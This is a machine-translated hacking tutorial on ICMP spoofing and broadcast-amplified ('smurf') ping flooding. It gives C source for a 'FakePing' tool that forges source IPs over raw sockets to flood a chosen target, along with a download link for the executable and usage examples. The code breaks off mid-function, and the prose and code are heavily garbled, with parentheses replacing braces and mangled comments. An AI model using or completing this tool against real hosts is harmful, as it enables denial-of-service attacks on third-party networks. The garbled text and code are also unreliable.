Recently, many people call you again to go with what Ping dead what site, but technically, no matter what the denial of service attacks, we need to satisfy a condition: with the least resources in exchange for being the largest consumption of the attacker. We like to go with Ping is not only strange: with the largest resource for each other the least harm; is ridiculous: people's war 50 years ago, probably belong to act, and in the Internet age, is not able to how many people's.
Today, we are for the Ping's, Ping is by sending ICMP message (type 8 code 0) to explore the existence of network hosts a tool, a long time ago, part of the operating system (eg win95), are not well dealt with large Ping packets , resulting in a Ping to Death of attacks (Ping bag with a large ruin each other or stuffed network), with operating system upgrades, network bandwidth upgrades, computer hardware upgrades, at present, virtually no large Ping packets are large attack effect (except for distributed attack), if we must use the Ping packets to attack other hosts, unless the use TCP / IP protocol or other characteristics of the network topology of most amplified the intensity of attacks (so-called positive feedback)
Under normal circumstances, Ping process is like this:
Host A sends packets to the host ICMP 8,0 B
Host B sends back messages to the host ICMp 0,0 A
Because ICMP was no link on, so give us an opportunity, assuming the host is now posing as the host A sends ICMP 8,0 C packets, the results what would happen? Clearly, the host B host C will send that report is paper away
Response to host C, the following structure:
C error masquerading as the host response
Host A ---------------------> Host B ------------------> Host C
This case, because only the continued distribution of the host A Ping packet processing without the need to return the EchoReply, so efforts have multiplied the attack, while in fact the host B and host C are by attack of the target, but will not stay under its own mark, is a covert attack two birds with one stone approach.
Methods SOCK_RAW above IP can easily camouflage, but even enlarged twice, for the more robust operating system and the larger the bandwidth, nor have much effect, do we again organized sports? Not right, let the enemy to us to enlarge Well, TCP / IP in a concept called the broadcast, the so-called broadcasting meant that there is an address, any host within the LAN will be sent to this address to receive the message (the same as radio broadcasting) if? Do? Yes! If we go to a broadcast address to send ICMP ECHO packet (that is Ping the broadcast address it), the result will be a lot of response, Ethernet, allowing each to receive a broadcast message will host response a ICMP_ECHOREPLY, if you want to test the machine in unix Ping LAN broadcast address what you will see a lot of dup packet response is to repeat the response, windows system, not the kind of results because the Microsoft Ping program does not respond to multiple unpacked, the first packet received after the dropped behind, and also Microsoft's system does not respond to broadcast address of the default package, so you better in a lot of unix host LAN test.
Here, smart You know what I want to do now? Hey hey, yes, when we pretend to be a broadcast address to attack the host sends Ping request time, all the broadcast address of the host will respond to the Ping request This is equivalent to the intensity of attacks is N times! (N = broadcast address to respond to Ping packets within the number of hosts)
Masquerading as the host C are wrong all the radio host response
Host A ---------------------> broadcast address ======================= ==> Host C
I wrote a FakePing tool, you can Http: / / www.patching.net / shotgun / FakePing.exe download.
Usage is FakePing.exe FakeIP TargetIP [PacketSize], if TargetIP is the broadcast address, then FakeIP was targeted.
Source announced as follows:
typedef struct _iphdr / / definition of IP header
(
unsigned char h_verlen; / / 4 位 first minister degrees, IP version 4
unsigned char tos; / / 8 services will type TOS
unsigned short total_len; / / 16 median total length (bytes)
unsigned short ident; / / 16-bit identification
unsigned short frag_and_flags; / / 3 flag bits
unsigned char ttl; / / 8 median survival time of TTL
unsigned char proto; / / 8-bit protocol (TCP, UDP or other)
unsigned short checksum; / / 16 位 IP header checksum
unsigned int sourceIP; / / 32 digital source IP address
unsigned int destIP; / / 32 位 purpose of IP address
) IP_HEADER;
/ / Define ICMP header
typedef struct _ihdr
(
BYTE i_type; / / 8 bit type
BYTE i_code; / / 8-bit code
USHORT i_cksum; / / 16 bit checksum
USHORT i_id; / / identification number (generally with the process number as the ID number)
USHORT i_seq; / / Message sequence number
ULONG timestamp; / / time stamp
) ICMP_HEADER;
/ / CheckSum: calculating checksum Functions
USHORT checksum (USHORT * buffer, int size)
(
unsigned long cksum = 0;
while (size> 1)
(
cksum + =* buffer + +;
size -= sizeof (USHORT);
)
if (size)
(
cksum + = * (UCHAR *) buffer;
)
cksum = (cksum>> 16) + (cksum & 0xffff);
cksum + = (cksum>> 16);
return (USHORT) (~ cksum);
)
/ / FakePing main function
int main (int argc, char ** argv)
(
int datasize, ErrorCode, counter, flag;
int TimeOut = 2000, SendSEQ = 0, PacketSize = 32;
char SendBuf [65535] = (0);
WSADATA wsaData;
SOCKET SockRaw = (SOCKET) NULL;
struct sockaddr_in DestAddr;
IP_HEADER ip_header;
ICMP_HEADER icmp_header;
char FakeSourceIp [20], DestIp [20];
/ / Accept the command line parameters
if (argc <3)
(
printf ("FakePing by Shotgun
");
printf ("This program can do Ping-Flooding from a FakeIP
");
printf ("Using a BroadCast IP as the FakeIP will enhance the effect
");
printf ("Email:
");
printf ("Shotgun@Xici.Net
");
printf ("HomePage:
");
printf ("http://It.Xici.Net
");
printf ("http://www.Patching.Net
");
printf ("USAGE:
FakePing.exe FakeSourceIp DestinationIp [PacketSize]
");
printf ("Example:
");
printf ("FakePing.exe 192.168.15.23 192.168.15.255
");
printf ("FakePing.exe 192.168.15.23 192.168.15.200 6400
");
exit (0);
)
strcpy (FakeSourceIp, argv [1]);
strcpy (DestIp, argv [2]);
if (argc> 3) PacketSize = atoi (argv [3]);
if (PacketSize> 60000)
(
printf ("Error! Packet size too big, must <60K
");
exit (0);
)
printf ("Now Fake% s Ping% s using Packet size =% d bytes
"
FakeSourceIp, DestIp, PacketSize);
printf ("Ctrl + C to Quit
");
/ / Initialize SOCK_RAW
if ((ErrorCode = WSAStartup (MAKEWORD (2,1), & wsaData))! = 0)
(
fprintf (stderr, "WSAStartup failed:% d
", ErrorCode);
ExitProcess (STATUS_FAILED);
)
if ((SockRaw = WSASocket (AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
(
fprintf (stderr, "WSASocket () failed:% d
", WSAGetLastError ());
ExitProcess (STATUS_FAILED);
)
flag = TRUE;
/ / Set IP_HDRINCL fill their own IP header
ErrorCode = setsockopt (SockRaw, IPPROTO_IP, IP_HDRINCL, (char *) & flag, sizeof (int));
if (ErrorCode == SOCKET_ERROR)
printf ("Set IP_HDRINCL Error!
");
__try
(
/ / Set send timeout
ErrorCode = setsockopt (SockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *) & TimeOut, sizeof (TimeOut));
if (ErrorCode == SOCKET_ERROR)
(
fprintf (stderr, "Failed to set send TimeOut:% d
", WSAGetLastError ());
__leave;
)
memset (& DestAddr, 0, sizeof (DestAddr));
DestAddr.sin_family = AF_INET;
DestAddr.sin_addr.s_addr = inet_addr (DestIp);
/ / Fill IP header
ip_header.h_verlen = (4 <<4 | sizeof (ip_header) / sizeof (unsigned long)); / / high 4 IP version number, the first minister of the low degree of four
ip_header.total_len = htons (sizeof (IP_HEADER) + sizeof (ICMP_HEADER)); / / 16 median total length (bytes)
ip_header.ident = 1;
/ / 16 ID
ip_header.frag_and_flags = 0;
/ / 3 flag
ip_header.ttl = 128;
/ / 8-bit TTL survival time
ip_header.proto = IPPROTO_ICMP;